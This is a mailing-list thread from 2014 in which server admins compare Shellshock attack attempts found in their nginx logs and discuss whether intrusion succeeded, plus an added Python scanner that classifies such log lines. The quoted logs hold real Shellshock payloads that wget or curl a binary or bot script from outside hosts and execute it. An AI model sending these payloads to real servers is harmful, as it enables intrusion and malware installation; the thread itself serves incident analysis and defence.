So I looked into it, and this is fairly safe; it seems to be only a test of whether that bash is vulnerable, but it actually does nothing.
74.201.85.69/ec.z -> is just the nginx welcome page.
Mainly, upgrade that bash :)
Medved
On 29.9.2014 at 10:23, René Klačan wrote:
I have the following in my logs
root@yuna /home/rene # grep '() {' /var/log/nginx/*
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /test HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET / HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z\x22"
/var/log/nginx/access.log:70.42.149.67 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget -O /var/tmp/ec.z 74.201.85.69/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z;rm -rf /var/tmp/ec.z\x22"
/var/log/nginx/access.log.1:209.126.230.72 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)&qu…
+0200] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"
/var/log/nginx/access.log.1:54.251.83.67 - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "() { :;}; /bin/bash -c \x22echo testing9123123\x22; /bin/uname -a"
/var/log/nginx/access.log.1:137.189.52.234 - - [27/Sep/2014:23:18:23 +0200] "GET /cgi-bin/test-cgi HTTP/1.0" 200 193 "-" "() { :;}; /bin/bash -c \x22wget http://stablehost.us/bots/regular.bot -O /tmp/sh;curl -o /tmp/sh http://stablehost.us/bots/regular.bot;sh /tmp/sh;rm -rf /tmp/sh\x22"
it looks a bit bad :-/ ... what do you recommend doing about it? just kill the suspicious processes? and look for any traces of whether they start again after a reboot?
2014-09-29 10:10 GMT+02:00 Michal Miklos <mimik(a)mimik.sk>:
The only thing to do is check whether you have a good version of bash.
On 29 Sep 2014, at 10:08, Jan B. Kolář <janbivoj.kolar(a)zazen-nudu.cz> wrote:
Hi,
maybe a stupid question - can you tell from the log whether the intrusion was successful or not?
Honza
On 29.9.2014 10:02, Petr Krcmar wrote:
> On 29.9.2014 at 09:57, Jiří Medvěd wrote:
>> Hey,
>>
>> from another machine:
> Yes, I found that too. Apparently someone is trying to push a
> rootkit there:
>
>
http://petrkrcmar.blog.root.cz/2014/09/29/utoky-na-bash-uz-bezi/
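An added example, not from anyone in this thread: a small scanner for nginx access-log lines like the ones René posted. It picks out the Shellshock pattern in the Referer and User-Agent fields, separates the harmless probes (ping, echo, uname) from the download-and-run payloads, and lists the file paths such a payload would write, which is where to look on disk. It assumes nginx's combined log format; the sample lines, addresses and hosts are constructed.

```python
import re
from dataclasses import dataclass
# nginx "combined" format: ip - user [time] "request" status bytes "referer" "user_agent"
LINE_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<request>[^"]*)" (?P<status>\d{3}) '
                     r'(?:\d+|-) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"')
# CVE-2014-6271 trigger: a function definition "() { ...; }" followed by the commands to run
SHOCK_RE = re.compile(r'\(\)\s*\{[^}]*\}\s*;\s*(?P<cmd>.*)$')
DOWNLOAD_RE = re.compile(r'wget|curl|chmod \+x|/tmp/|/var/tmp/')  # fetches or drops a second stage
PROBE_RE = re.compile(r'\b(?:ping|echo|uname|id|whoami)\b')       # only checks whether bash is vulnerable
DROP_RE = re.compile(r'-[oO]\s+(\S+)')                            # wget -O / curl -o output paths

@dataclass
class Finding:
    ip: str
    path: str       # requested URI, e.g. a CGI script
    header: str     # logged header that carried the payload: "referer" or "agent"
    command: str    # what the attacker asked bash to run
    category: str   # "download-and-execute", "probe" or "other"
    dropped: list   # files the command would write; look for these on disk
    status: int     # nginx's own response code, not evidence that bash ran anything

def classify(cmd: str) -> str:
    return "download-and-execute" if DOWNLOAD_RE.search(cmd) else "probe" if PROBE_RE.search(cmd) else "other"

def scan(lines):
    """One Finding per log line whose Referer or User-Agent carries a Shellshock payload."""
    findings = []
    for raw in lines:
        line = raw.split(':', 1)[1] if raw.startswith('/') else raw  # drop grep's "file:" prefix
        m = LINE_RE.match(line)
        if not m:
            continue
        for header in ('referer', 'agent'):
            # nginx logs quotes inside header values as \x22; undo that so the command reads naturally
            hit = SHOCK_RE.search(re.sub(r'\\x([0-9a-fA-F]{2})', lambda e: chr(int(e[1], 16)), m[header]))
            if hit:
                cmd = hit['cmd'].strip()
                parts = m['request'].split()
                findings.append(Finding(m['ip'], parts[1] if len(parts) > 1 else m['request'], header,
                                        cmd, classify(cmd), DROP_RE.findall(cmd), int(m['status'])))
    return findings

# Constructed sample lines modelled on the thread, using RFC 5737 documentation addresses
SAMPLE_LOG = [
    '/var/log/nginx/access.log:192.0.2.10 - - [28/Sep/2014:08:18:37 +0200] "GET /cgi-bin/test.sh HTTP/1.0" 200 193 "-" '
    '"() { :;}; /bin/bash -c \\x22wget -O /var/tmp/ec.z http://198.51.100.5/ec.z;chmod +x /var/tmp/ec.z;/var/tmp/ec.z\\x22"',
    '192.0.2.20 - - [25/Sep/2014:07:26:09 +0200] "GET / HTTP/1.0" 200 193 "() { :; }; ping -c 11 198.51.100.7" "shellshock-scan"',
    '192.0.2.30 - - [27/Sep/2014:21:35:34 +0200] "GET / HTTP/1.1" 200 193 "-" "Mozilla/5.0"',
]
```

To Honza's question: the access log alone cannot show whether the payload ran, because the 200 is nginx answering the HTTP request, not bash reporting back. Confirmation has to come from the host itself: whether the dropped paths exist, what processes are running, and whether anything persists across a reboot.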
_______________________________________________ Community-list
mailing list Community-list(a)lists.vpsfree.cz
<mailto:Community-list@lists.vpsfree.cz>